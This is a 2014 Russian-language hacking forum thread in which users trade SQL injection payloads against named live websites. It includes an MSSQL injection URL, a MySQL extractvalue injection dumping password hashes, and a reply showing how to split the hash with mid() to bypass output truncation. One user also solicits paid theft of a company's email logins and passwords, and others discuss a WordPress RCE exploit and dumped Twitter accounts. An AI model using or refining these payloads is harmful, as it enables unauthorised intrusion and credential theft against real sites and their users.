08.01.2014, 23:35
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от Xvir
Ребята помогите раскрутить mssql не как не доходит!
http://www.ekb.spk.ru/spkekb/shop/prod_detail/_t_/prod=krug_nerzhaveyuschii
http://www.ekb.spk.ru/spkekb/shop/order.asp/_t_/prod=krug_nerzhaveyuschii'+or+1=(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+not+in+('PrValues','SAP_Param5'))--
|
|
|
09.01.2014, 18:04
|
|
Новичок
Регистрация: 08.02.2011
Сообщений: 11
С нами:
8030486
Репутация:
0
|
|
Друзья у кого нибудь есть желание за возногрождение поработать на этим сайтом tehkomplekt-ural.ru а именно мне нужно все логины и пассы почты их если что пишите в личку
|
|
|
|
09.01.2014, 20:56
|
|
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами:
6940406
Репутация:
0
|
|
Привет всем!)
Помогите пожалуйста докрутить инъекцию, есть она у меня такого вида "
Сообщение от None
and extractvalue(rand(),concat(0x3a,(select concat(0x3a,pass) from server.users limit 1,1))))--
"
Нужный мне хеш она выводит, но не полностью, а только до 32 символов. Как можно обойти это ограничение, и есть ли какое-то готовое решение? |
|
|
|
09.01.2014, 21:26
|
|
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами:
6940406
Репутация:
0
|
|
Да. но скрипт Hash Id эго тип хеша определить не может.
Сообщение от None
46f94c8de14fb36680850768ff1b7f2
|
|
|
|
09.01.2014, 21:42
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Massay
Привет всем!)
Помогите пожалуйста докрутить инъекцию, есть она у меня такого вида ""
Нужный мне хеш она выводит, но не полностью, а только до 32 символов. Как можно обойти это ограничение, и есть ли какое-то готовое решение?
and extractvalue(rand(),concat(0x3a,(select mid(pass,1,31) from server.users limit 1,1))))--
and extractvalue(rand(),concat(0x3a,(select mid(pass,32,31) from server.users limit 1,1))))--
Сообщение от K800
У этого хэша 31 символ, а не 32
У него еще символ на конкатенацию ушел
|
|
|
|
09.01.2014, 21:55
|
|
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами:
6940406
Репутация:
0
|
|
Спасибо большое!!!
|
|
|
|
10.01.2014, 21:04
|
|
Участник форума
Регистрация: 29.09.2012
Сообщений: 233
С нами:
7167926
Репутация:
20
|
|
Как использовать эту уязвимость ? http://vagosec.org/2013/12/wordpress-rce-exploit/
|
|
|
|
11.01.2014, 00:42
|
|
Новичок
Регистрация: 28.10.2012
Сообщений: 3
С нами:
7126166
Репутация:
0
|
|
Подскажите в какую сторону копать по добыче акков твиттера. Все онлайн-магазы пишут что аккаунты с дампа. Не брут, не свежерег. Иньецкии в базы?
|
|
|
|
11.01.2014, 01:08
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от websheff
Подскажите в какую сторону копать по добыче акков твиттера. Все онлайн-магазы пишут что аккаунты с дампа. Не брут, не свежерег. Иньецкии в базы?
Просто есть приватная уязвимость на сайте твиттера, которая позволяет каждый день сливать от туда по 50-100к акков.
|
|
|
|
11.01.2014, 01:48
|
|
Новичок
Регистрация: 28.10.2012
Сообщений: 3
С нами:
7126166
Репутация:
0
|
|
Сообщение от kingbeef
Просто есть приватная уязвимость на сайте твиттера, которая позволяет каждый день сливать от туда по 50-100к акков.
получается все селлеры барижат одними и теми же акками? Или на каждого 50-100к акков?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
